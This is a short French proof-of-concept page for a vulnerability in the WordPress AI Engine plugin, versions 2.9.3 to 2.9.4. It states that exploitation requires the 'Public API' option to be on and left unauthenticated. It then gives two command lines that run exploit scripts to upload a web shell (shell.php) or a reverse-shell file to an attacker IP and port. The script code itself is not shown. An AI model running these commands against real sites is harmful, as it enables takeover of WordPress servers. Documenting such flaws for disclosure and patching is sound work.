
Plugin WordPress AI Engine 2.9.3 - 2.9.4 – Preuve de concept
Plugin WordPress AI Engine 2.9.3 - 2.9.4 Preuve de concept
Veuillez noter que cette vulnérabilité ne peut être exploitée que si l’option “Public API” est activée, désactivée par défaut, et si aucun Bearer Token n'est configuré, ni aucune authentification personnalisée ajoutée et utilisée pour protéger l'API.
python3 exploit-auto.py --url "http://target.com" --username "Admin" --password "L87*********C4u" --file reverse.php --attacker-ip 127.0.0.1 --attacker-port 4444
python3 exploit.py \
--url "http://target.com/" \
--username "Admin" \
--password "L87*********C4u" \
--file shell.php